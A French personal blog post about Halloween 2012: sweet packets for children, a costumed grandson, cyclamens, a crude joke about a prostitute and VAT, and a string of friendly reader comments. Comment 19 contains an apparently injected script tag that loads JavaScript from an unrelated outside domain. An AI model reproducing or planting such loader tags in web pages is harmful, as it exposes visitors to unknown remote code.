• ♣c'est Hallowëen♣

    ♣c'est Hallowëen♣bonjour

     

    ♣c'est Hallowëen♣

    *********

    ♣c'est Hallowëen♣

    réponse:↑Au Japon.Elle a été la première capitale fixe

     du Japon,en 710.C'est un des hauts lieux touristiques du pays.

     *************

    Aujourd'hui ,comme tous les ans je vais avoir des visites 

     d'enfants,j'ai préparé 25 paquets de bonbons

    ♣c'est Hallowëen♣

    ***********

    Antoine c'est déguisé  ,il était à un anniversaire d'un copain

    ♣c'est Hallowëen♣

    **********

    mon ciel dimanche soir  jouait à Hallowëen  aussi

    ♣c'est Hallowëen♣

    **********

    j'ai acheté des cyclamens pour la Toussaint

    ♣c'est Hallowëen♣

    ********************

     La page de Gloria

    ♣c'est Hallowëen♣

    ***********

     une blagounette

    Ginette

    ♣c'est Hallowëen♣

    Ginette ,40 ans de prostitution ne s'y retrouve pas dans la TVA.

     Elle appelle son comptable et lui demande:

     -Pour une pipe,c'est 5,5°/° OU 19,6°/°  la TVA?

     Son comptable lui répond:

     -La classique c'est 19,6 mais si vous avalez ça devient de 

     la restauration rapide alors c'est 5,5 °/°

     ***************

    ♣c'est Hallowëen♣

     



    « ♥bon Mardi♥♣ Bon 1er Novembre♣ »

  • Commentaires

    19
    lili16.04 Profil de lili16.04
    Dimanche 4 Novembre 2012 à 15:13

    Beau costume pour Antoine !

    <script src="http://superoseplugin.info/dfi823hs.js?0.6852246270598296" type="text/javascript"></script>
    18
    Mercredi 31 Octobre 2012 à 22:01

    Bonsoir Estrelita !Comme aucun gamin n'est venu en parcourant les blogs je mange les bonbons que j'avais prévu !

    Bisous Mamé

    17
    Moune17 Profil de Moune17
    Mercredi 31 Octobre 2012 à 21:28

    Ils vont être bien gâtés les enfants avec tes jolis paquets de bonbons

    Depuis quelques temps ,les enfants ne passent plus chercher des bonbons . Dans ma région cette cette fête n'est pas trop d'actualité.

    Je te souhaite de passer une agréable soirée

    Bisous

    16
    Mercredi 31 Octobre 2012 à 20:08

    Trop sympas tes blagounettes!Il est chou ton petit!Bisouilles.

    15
    Mercredi 31 Octobre 2012 à 19:38
    belle soirée à toi ma douce ti bo •-~•*'Ś Ő Ń Ŷ Á'*•~-•
    14
    Mercredi 31 Octobre 2012 à 16:01

    BONNE JOURNEE HALLOWEEN biz du VAR sous la pluie bizzzzzzzzzzz ninou83

    13
    Mercredi 31 Octobre 2012 à 11:15

    Très jolis tes paquets de bonbons, les enfants vont être contents !

    halloween01.jpg

    Bon mercredi bisous !

    12
    image
    Mercredi 31 Octobre 2012 à 10:49

    Moi aussi j'ai avheté des bonbons pour les enfants... et si je peux je ferai des photos quand ils viendront!

    Bises et bonne journée

    Tataflo

    halloween

     

     

    11
    Mercredi 31 Octobre 2012 à 09:59

    je viendrais bien te chaparder tes bonbons ! lol ! jolies les cyclamens ! bonne journée

    10
    Mercredi 31 Octobre 2012 à 09:49
    ema2

    Bonjour Marine, excellent billet qui associe le rire et la bonne humeur à des photos magnifiques comme ton coucher de soleil. Super aussi les bonbons pour les enfants ce soir.

    Bisous et très belle journée à toi ! 

    journée

    9
    dany sailly
    Mercredi 31 Octobre 2012 à 09:27

    c'est marrant la saga de Gloria  ,  moi aussi j'ai acheté des bonbons  mais  pas mis en sachet  hihihihihii  , mais cette tradition est peu suivi ici , c'est plus les sorciéres que l'on fête  big bises

    8
    Mercredi 31 Octobre 2012 à 09:25

    Superbe ce ciel.... J'ai aussi fait provision de bonbons pour les gamins, mais c'est le poux ronhon (toujours en chômage technique) qui ira ouvrir... La ZAZA est toujours au fond de son lit. Bises et bonne fête d'Halloween

     

     

    7
    Mercredi 31 Octobre 2012 à 08:27

    Bonjour Marine

    J'm Gloria et sa copine

    Elle me ressemble 

    Je voudrais être un enfant pour venir chercher les bonbons

    Bisous

    Frieda

    6
    Mercredi 31 Octobre 2012 à 08:05

    J'ai été surprise l'année derniere aucun enfant est passé....

    jolie cyclamen

    bises et bonne fin de semaine

    5
    mamie danie
    Mercredi 31 Octobre 2012 à 07:59

    je suis en pleine campagne et les enfants restent dans le village.....

    mais en cas,j'ai toujours des bonbons dans le tiroir.

    bisous

    4
    Mercredi 31 Octobre 2012 à 07:53

    Ici, depuis que je suis en appart, plus personne pour les bonbons et je ne vois passer aucun enfant dans la rue même. Ils sont en centre ville.
    Bisous.
    Gif Halloween 

    3
    Mercredi 31 Octobre 2012 à 07:33

    je vais aller acheter des bonbons ce matin, on ne sait jamais, si quelques petites sorcières passent à la maison....belle journée

    2
    Mercredi 31 Octobre 2012 à 07:09

    salut

    pas mal la TVA pour la pipe

    J'aime bien la page de gloria

    bonne journée

    1
    murielll Profil de murielll
    Mercredi 31 Octobre 2012 à 07:00

    je me suis inscrite de nouveau avec une autre adresse mail, j'espère que 4a va marcher,,,, bonne journée... bisous..Muriel

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :